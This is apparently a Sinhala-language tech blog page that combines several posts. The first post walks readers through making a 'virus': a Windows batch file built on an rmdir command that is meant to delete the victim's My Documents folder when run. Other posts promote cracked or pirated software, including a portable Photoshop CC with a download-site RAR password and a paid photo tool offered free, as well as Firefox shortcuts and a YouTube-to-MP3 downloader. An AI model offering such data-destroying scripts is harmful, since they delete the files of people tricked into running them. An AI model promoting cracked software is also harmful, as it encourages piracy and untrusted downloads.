තවත් සුපිරි VIRUS ගෙම් 1කක්




හයි යලුවනෙ කොහොමද ඔයලට ?? මෙන්න එහෙන්ම් අපි හදමුද තවත් පොඩි පහෙ virus 1කක්. 
මේකත් කලින් ලියපුවා වගේම c program එකක්.මේක කව්රුහරි run කරොත් එයාගේ my document delete වෙලා යනවා.මාර simple virus එකක්.මේ කියන විදිහට කරගන්නකෝ...


01- Notepad open කරගන්න.


02- දැන් මේ code එක copy - paste කරගන්න.
rmdir C:\Documents and Settings \S\Q


03- දැන් BAT File extension ආකාරයට save කරගන්න.ඒ කිව්වේ virus.BAT වගේ...


 04- ඔන්න වැඩේ හරි...

අලුත්ම Adobe Photoshop CC Portable (165MB) පමණයි, දැන්ම Download කරගන්න.

අද මම ඔයාලට දෙන්නේ සුපිරිම අලුත්ම Software එකක්. Photoshop කීවහම ඉතින් කටත් මතක් වෙන්නේ CS සෙට් එක විතරයිනේ. දැන් CS නවත්තල adobe කාරයෝ CC පටන් අරන් තියෙන්නේ.
එකේ අලුත්ම Photoshop version එක තම මම අද ඔයාලට දෙන්නේ.
මේක install කරන එක කිසිම ගේමක් නැ. ඇත්තටම කිවොත් මේක install කරන්ඩ නැ.
Download කරා Extract කරා. open කරලා වැඩ ටික කරගත්ත.

RAR Password = "www.downloadha.com"

32 Bit Version එක






64 bit version එක

Adobe Photoshop CS6 Portable Download කරගන්න.(100MB)


         මේ දවස් ටිකේ ටිකක් කාර්යබහුල වෙලා හිටපු නිසා පෝස්ට් එකක් දාන්න පරක්කු වුනාට කස්ටිය තරහ වෙන්ට එපා... ටික දවසක් පරක්කු වෙලා හරි එළ කිරි පෝස්ට් කෑල්ලක් ගෙනාව ඔන්න.  මේක ගොඩක් අයට වැදගත් පෝස්ට් එකක් වෙයි කියල හිතෙනවා. හැබැයි ඉතින් ගොඩක්ම මේක වටින්නෙ ග්‍රැපික් ඩිසයිනර්ලට....

    Adobe Photoshop CS6 Portable ඕනම Pen කෑල්ලක දාගෙන ගිහින් ඔන තැනක වවැඩකරන්න පුළුවන් කිසිම අවුලක් නැතිව... නියමයි නේ... Adobe Photoshop CS6 කියන්නෙ අළුත්ම වර්සන් එක නිසා ගොඩක් වැඩ කරන්නත් ලේසියි... හරි එහෙනම් Download කරගෙනම බලන්නකො... පල්ලෙහා තියෙනවා ලින්ක් එක. අරගෙන බලන්න... WinRAR File එක Extract කරාම පොඩි Setup File එකක් තියෙනවා එක Run කරාම වැඩේ Complete. 



ඔබේ Photos වලට Effects එකතු කරගන්න - Photo Effects Studio






අද ආවේ ටිකක් වටිනා දෙයක් දීල යන්න. අපි ගොඩක් දෙනා කැමතියි photo edit කරන්න. එත් ඉතින් හැමෝටම බෑනේ Photoshop. ඒ උනාට ඉතින් අපි කවුරුත් කැමතියි නේ ඉතින් අපේ ෆොටෝ එකක් එහෙම පොඩි වැඩ කෑල්ලක් එහෙම දාල ලස්සන කරලා ෆේස්බුක් එකේ එහෙම කෙල්ලොන්ට පේන්න දාන්න.... ඔන්න එකට හරියන පට්ට සොෆ්ට්වෙයා කෑල්ලක් තමයි අද මේ දෙන්න හදන්නේ.... 

මේකේ නම Photo Effects Studio 3.15...

නිකන් දෙන එකක් නෙමේ මේක සල්ලි දීල තමයි ගන්න ඕන ඒ උනාට සල්ලි ඕනේ නැ

 


හදන ආකාරය  
1. මේක පාවිච්චි කරන්න පට්ට ලේසි මුලින්ම ෆයිල් මෙනු ඒකෙන ඕපන් ගිහින් ෆොටෝ එක තෝර ගත්ත 
2. Effects කියන මෙනු එකෙන් ගිහින් කැමති ගැලපෙන ලස්සන එකක් තෝරලා දාගත්තා
3. ෆොටෝ එක සේව් කරා. වැඩේ ඉවරයි.මේකේ  Effects බර ගානක් තියෙනවා. Effect එක උඩ ක්ලික් කරපු ගමන පට ගාල පොටෝ එකට ඇප්ලයි වෙනවා කිසි අවුලක් නැහැ.

Firefox shortcut ටික මෙන්න..


මෙන්න අද දෙන්න යන්නේ Firefox Shortcuts ටිකක් තමා අද දෙන්න යන්නේ.ඔයාලට මතක ඇතිනේ මම මීට කලින් Google Chrome එකේ Shortcuts ටික දුන්නා මතක ඇතිනේ. ඔය මගේ Post එකට යටින් දාලා තියෙන්නේ  Firefox Shortcuts ටික තමා.බාගන්න ඕන කරන අය ඉන්නව නම් ඔය පහල තියන මෙතනින් ලබා ගන්න කියන තැනට Click කරලා එතනින් ගන්න පුලුවන්.මේක ගැන ඔයාලගේ අදහසක් එහෙම ලියලා යන්නකො හොදේ....

මෙතනින් ලබා ගන්න....



Ctrl+N - It use for Open New Browser Window.

Ctrl+T - It use for Open New Tab on Existing window.

Ctrl+W or Ctrl+F4 - It use for Close the current window or Tab.

Ctrl+R or F5 - For refresh The Page

Ctrl+F5 orCtrl+Shift+R - Refresh the page with override cache

Esc - Stop

Ctrl + O - It use for Open File

Alt+Home - Home

F1 - Firefox Help

F11 - Toggle Full Screen of Browser Window.

Ctrl+Tab - For Changing Tab between Existing window.

Ctrl+U - Open View Source Page of any webpage.

Ctrl+I or Ctrl+B - Open Bookmark window in left sidebar

Ctrl+P - For Print Command

Ctrl+A - Select All

Ctrl+S - Save Page As

Ctrl+D - Bookmark This Page

Ctrl+F - Find

Ctrl+G or F3 - Find Again

Ctrl+H - open History Window In left Sidebar.

Ctrl+J - Open Downloads Window

Ctrl+Z - Undo Your Process

Ctrl + Y or Ctrl + Shift + Z - Redo your Process

Ctrl+C - Copy

Ctrl+V - Paste

Ctrl + Shift + Delete - Clear your Private Data

F7 - To Open Browser in Caret mode

Backspace or Alt+Left Arrow - Back

Shift+Backspace or Alt+Right Arrow - Forward

Alt + Enter - Copy your existing window tab and Open It in New Tab

Ctrl + Tab or Ctrl + Shift + Tab — rotate forward to the next window tab

Down Arrow – Scroll down

Ctrl+ "+" or Ctrl+ Scroll up - Increase Text Size (Zoom In)

Ctrl+ "-" or Ctrl+ Scroll Down - Decrease text Size (Zoom Out)

Ctrl+ 0 (Zero) - Normal Text Size (Default Zoom Mode)

Alt+ Scroll Down - One step page go down

Alt+ Scroll Up - One step page go Up

Ctrl+Shift+I - DOM Inspector

Ctrl + L or ALT + D - Select Location Bar

Ctrl + Enter - To complete URL with .com

Ctrl + Shift + Enter - To complete URL with .org

Shift + Enter - To complete URL with .net

Ctrl + Up Arrow - Choose previous Search engines to search information

Ctrl + Down Arrow - Choose Next Search engines to search information

Alt + Up Arrow or Alt + Down Arrow - Open List of available Search Engine


game ගහද්දි slow වෙන එක නවත්වමු


ගොඩක් අයට එන ප්රශ්නයක් මේක. ගේම්ස් ගහද්දි ස්ලෝ වෙනවා හිරවෙනවා.... මෙන්න ඒකට මට හම්බුනා පට්ට බඩුවක්.... නමින් Wise Game Booster 1.23.
මේකෙන් ගොඩක් වැඩ කරන්න පුලුවන්.. ඔයාගෙ ගේම් ගහද්දි ස්ලෝ වෙන program අයින් කරල ගේම් එකට හොද මෙමරියක් අරන් දෙනව.. තව වැඩ ටිකක් තියනවා... ඇරන්ම බලන්න මෙන්න ... 





ඔබේ පරිගණකය Transformers එකෙ වගේ කරමු


    ඔන්න ඉතින් කාලෙකට පක්සෙ ගෙනාව පරිගණකයන්හි ලස්සන ගැන හිතන ආස යාලුවන්ට වගේම Transformers ෆිල්ම් එකට ආස යාලුවන්ට පොඩි මෙවුව එකක්.. මෙවුව එකක් කිවුවෙ Theme එකක්..මෙහෙමයි පරිගණකවල ඔපරේටින් එකට අමතරව ඒන ලස්සන කරගන්න විවිද ක්‍රම තියෙනව.. ඉතින් මේක ඇවිල්ල තීම් එකක්.. හැමෝම දන්නවනෙ ඉතින්.. අනික මේක සම්පූර්ණයෙන්ම වෙනස්.. හරියට Transformers වගේ.. Transformers ගැන ඉතින් දන්නවනේ අපේ යාලුවො.. ඒක ඇවිල්ල ලෝක ප්‍රසිද්ධ චිත්‍රපට මාලාවක්නෙ.. අපි නොදන්න Transformers කිවුවලු ඈ.. හරි මේක හැබැයි වැඩකරන්නෙ windows 7 වලට පමනයි.. xp වලටත් දාන්න පුලුවනි.. හැබැයි මෙලෝ රහක්නෑ.. ඇයි දන්නවද? මේක xp වලට දැම්මට සම්පූර්ණයෙම්ම එන්නෑ.. ඒකයි අවුල.. කොහොමහරි මේකනම් පට්ටම පට්ට. බලන්න.. 

කොහොමද මරු නේ? මේක දෙන අය මෙන්න මේ වගේ නෝට් එකක් දාල තීනවා..  [NOTE: READ ALL FIRST THE INSTRUCTION BEFORE YOU INSTALL.INSTALL කිරීමට පෙර කියවා ඉන්න දෙන උපදෙස් ]එහෙනම් පල්ලහ ලින්කුවෙන් බාගන්න.. 


දුරකථන වලට Themes නොමිලේ හදාගමුද




ඔන්න ඉතින් වෙනදා වගේම අදත් අප කාටත් වැදගත් වෙන දෙයක් තමා අරගෙන ආවෙ.අද දෙන්න යන්නෙ වෙබ් සයිට් ටිකක් ඒවා වලින් අපිට පුලුවන් අපේ දුරකථන වලට Themes හදා ගන්න.ඒ විතරක් නෙමේ ඒ වගේම Mobile 9. Zedge කියන අඩවි වලින් අපිට අපේ දුරකථන වලට වැදගත් කරන දේවල් ගොඩක් නොමිලේ බාගත කරන්න පුලුවන්.මම තව කියන්න ඕනෙ නෑනෙ එහෙනම් ඔයාලම ගිහින් බලන්නකො කොහොමද කියලා හොදේ. .ඒ වගේම මේක ප්‍රයෝජනවත් උනා නම් ඔයාලටත් මේ ගැන කොමන්ට් එකක් එහෙම දාලා යන්න අමතක කරන්න එපා හොදේ....


මේ තියෙන්නෙ ඒ අඩවි ටික

Zedge      Mobile 9      Ownskin

photo edit කරන්න නියම website එකක්..

ඉතින් යලුවනේ මේ ටිකේම මෘදුකාංග නේ දුන්නේ.අද මම ඔයලට දෙන්න යන්නේ on line photo edit කර ගන්න පුලුවන් ලින්ක් එකක්.ඇත්තම කියනවා නම් මේකත් photo shop වගේ.photo shop කියන්නේ මොනාද කියලා ඔයලා ඉතින් දන්නවා ඇතිනේ.එහෙනම් ඔය පල්ලෙහයින් තියන මෙතනින් ලබා ගන්න කියන තැනට ඔබන්නකො.ඔයාලත් බලන්නකො 


download now

youtube videos mp3 විදිහට download කර ගමු...



ඔන්න ඉතින් මම අද ඔයාලට අරගෙන ආවෙ තවත් නියම මෘදුකාන්ගයක් මේකෙන් අපිට පුලුවන් You Tube එකේ තියන වීඩියෝ Mp3 විදියට ඩවුන්ලෝඩ් කර ගන්න.කොහොමද නේද වැඩේ.Mp3 කර කර ඉන්න ඕනෙත් නෑ. ගන්න ගමන්ම Mp3 කර ගන්න පුලුවන්.එහෙනම් ඉතින් ඔයාලත් අරගෙනම බලන්නකො කොහොමද කියලා...

download